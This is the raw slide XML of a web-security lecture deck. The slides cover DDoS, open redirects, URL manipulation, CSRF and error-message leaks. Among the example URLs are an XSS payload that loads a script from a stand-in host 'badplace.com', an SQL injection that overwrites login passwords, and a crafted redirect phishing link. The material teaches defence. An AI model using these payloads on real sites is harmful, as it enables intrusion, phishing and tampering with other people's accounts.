                    <a:pt x="448" y="48"/>
                    <a:pt x="624" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="800" y="0"/>
                    <a:pt x="968" y="144"/>
                    <a:pt x="1056" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1144" y="384"/>
                    <a:pt x="1148" y="564"/>
                    <a:pt x="1152" y="744"/>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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2743200" y="3048000"/>
              <a:ext cx="1536700" cy="1981200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 968"/>
                <a:gd name="T1" fmla="*/ 48 h 1248"/>
                <a:gd name="T2" fmla="*/ 624 w 968"/>
                <a:gd name="T3" fmla="*/ 96 h 1248"/>
                <a:gd name="T4" fmla="*/ 912 w 968"/>
                <a:gd name="T5" fmla="*/ 624 h 1248"/>
                <a:gd name="T6" fmla="*/ 960 w 968"/>
                <a:gd name="T7" fmla="*/ 1152 h 1248"/>
                <a:gd name="T8" fmla="*/ 960 w 968"/>
                <a:gd name="T9" fmla="*/ 1200 h 1248"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="968" h="1248">
                  <a:moveTo>
                    <a:pt x="0" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="24"/>
                    <a:pt x="472" y="0"/>
                    <a:pt x="624" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="776" y="192"/>
                    <a:pt x="856" y="448"/>
                    <a:pt x="912" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="968" y="800"/>
                    <a:pt x="952" y="1056"/>
                    <a:pt x="960" y="1152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="968" y="1248"/>
                    <a:pt x="964" y="1224"/>
                    <a:pt x="960" y="12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20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4114800" y="1981200"/>
              <a:ext cx="1066800" cy="2971800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 672 w 672"/>
                <a:gd name="T1" fmla="*/ 0 h 1872"/>
                <a:gd name="T2" fmla="*/ 336 w 672"/>
                <a:gd name="T3" fmla="*/ 432 h 1872"/>
                <a:gd name="T4" fmla="*/ 48 w 672"/>
                <a:gd name="T5" fmla="*/ 1344 h 1872"/>
                <a:gd name="T6" fmla="*/ 48 w 672"/>
                <a:gd name="T7" fmla="*/ 1872 h 1872"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="672" h="1872">
                  <a:moveTo>
                    <a:pt x="672" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="104"/>
                    <a:pt x="440" y="208"/>
                    <a:pt x="336" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="656"/>
                    <a:pt x="96" y="1104"/>
                    <a:pt x="48" y="1344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1584"/>
                    <a:pt x="48" y="1784"/>
                    <a:pt x="48" y="1872"/>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1"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2590800"/>
              <a:ext cx="2362200" cy="2286000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1488 w 1488"/>
                <a:gd name="T1" fmla="*/ 104 h 1400"/>
                <a:gd name="T2" fmla="*/ 624 w 1488"/>
                <a:gd name="T3" fmla="*/ 152 h 1400"/>
                <a:gd name="T4" fmla="*/ 96 w 1488"/>
                <a:gd name="T5" fmla="*/ 1016 h 1400"/>
                <a:gd name="T6" fmla="*/ 48 w 1488"/>
                <a:gd name="T7" fmla="*/ 1400 h 1400"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1488" h="1400">
                  <a:moveTo>
                    <a:pt x="1488" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1172" y="52"/>
                    <a:pt x="856" y="0"/>
                    <a:pt x="624" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="304"/>
                    <a:pt x="192" y="808"/>
                    <a:pt x="96" y="1016"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1224"/>
                    <a:pt x="56" y="1336"/>
                    <a:pt x="48" y="14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2"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="3517900"/>
              <a:ext cx="1905000" cy="1358900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1200 w 1200"/>
                <a:gd name="T1" fmla="*/ 136 h 856"/>
                <a:gd name="T2" fmla="*/ 576 w 1200"/>
                <a:gd name="T3" fmla="*/ 40 h 856"/>
                <a:gd name="T4" fmla="*/ 192 w 1200"/>
                <a:gd name="T5" fmla="*/ 376 h 856"/>
                <a:gd name="T6" fmla="*/ 0 w 1200"/>
                <a:gd name="T7" fmla="*/ 856 h 856"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1200" h="856">
                  <a:moveTo>
                    <a:pt x="1200" y="136"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="972" y="68"/>
                    <a:pt x="744" y="0"/>
                    <a:pt x="576" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408" y="80"/>
                    <a:pt x="288" y="240"/>
                    <a:pt x="192" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="512"/>
                    <a:pt x="48" y="684"/>
                    <a:pt x="0" y="856"/>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23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2133600" y="1752600"/>
              <a:ext cx="1143000" cy="533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Master</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2362200" y="2286000"/>
              <a:ext cx="228600" cy="609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Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3276600" y="1828800"/>
              <a:ext cx="1752600" cy="152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Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3276600" y="2133600"/>
              <a:ext cx="3429000" cy="533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27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3124200" y="2209800"/>
              <a:ext cx="3581400" cy="1371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28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2438400" y="2286000"/>
              <a:ext cx="609600" cy="2057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9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="4800600"/>
              <a:ext cx="1905000" cy="76200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Real Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Line 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3124200" y="2286000"/>
              <a:ext cx="3581400" cy="2438400"/>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073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DoS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit ability of systems to send spoofed packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rate controls in upstream distribution nets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use modified TCP connection handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block IP broadcasts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block suspicious services &amp; combinations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3547493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DoS (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage application attacks with “puzzles” to distinguish legitimate human requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good general system security practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use mirrored and replicated servers when high performance and reliability required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888352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Redirect</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG"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t>An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real redirect: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.vulnerable.com/redirect.asp?=http://www.links.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faked link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.vulnerable.com/security/advisory/23423487829/../../../redirect.asp%3F%3Dhttp%3A//www.facked.com/advisory/system_failure/password_recovery_system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </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63716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Manipulation Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine a user receives an invitation to view his profile at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.site.com/profile?userid=2249</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accidentally he omits the final "9" and opens: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.site.com/profile?userid=224</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a result – he opens someone else's profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gaining access to someone's personal information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409573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URL manipulation?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why would someone manipulate URL?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting a web server to deliver web pages he is not supposed to have access to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Trigering an exception thus revealing information in an error message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06077" y="4191000"/>
            <a:ext cx="2731847" cy="212708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644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Bug Hypothesis (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where do bugs come from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bugs arise from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>software's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accepting inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Producing outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performing computations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9800" y="4191000"/>
            <a:ext cx="2298123" cy="20223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277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Manipulation Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Removing any site from Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even when you don’t control it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit in Google Webmaster Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fixed within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just open the following URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.google.com/webmasters/tools/removals-request?hl=en&amp;siteUrl=http:// {YOUR_URL} /&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>urlt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>= {URL_TO_BLOCK}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> </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708214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Manipulation Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271462" y="4267200"/>
            <a:ext cx="8686800" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html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3400" y="1066800"/>
            <a:ext cx="8162925" cy="2905125"/>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2786813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Manipulation Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL Attack as an XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=”http://www.badplace.com/nasty.js”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL Attack as an SQL Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270n3d%27%3b--%00</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437770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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8686800" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>A.k.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> one-click attack or session riding and abbreviated as CSRF (pronounced sea-surf) or XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>A vulnerable URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Secret cookies and accepting only POST requests does not help</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3662261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Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error messages can reveal important information about your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error messages like that should not be allowed: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5" name="Picture 11" descr="tomcat-erro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95153" y="3276600"/>
            <a:ext cx="4153694" cy="3034283"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx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354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569" y="771236"/>
            <a:ext cx="4230831" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Error Messages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10242" name="Picture 2" descr="http://www.flashdaweb.com/blog/wp-content/uploads/2009/03/png-symbol-error-256x25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2800" y="2250209"/>
            <a:ext cx="2438400" cy="24384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133600" y="5131955"/>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2207015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Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
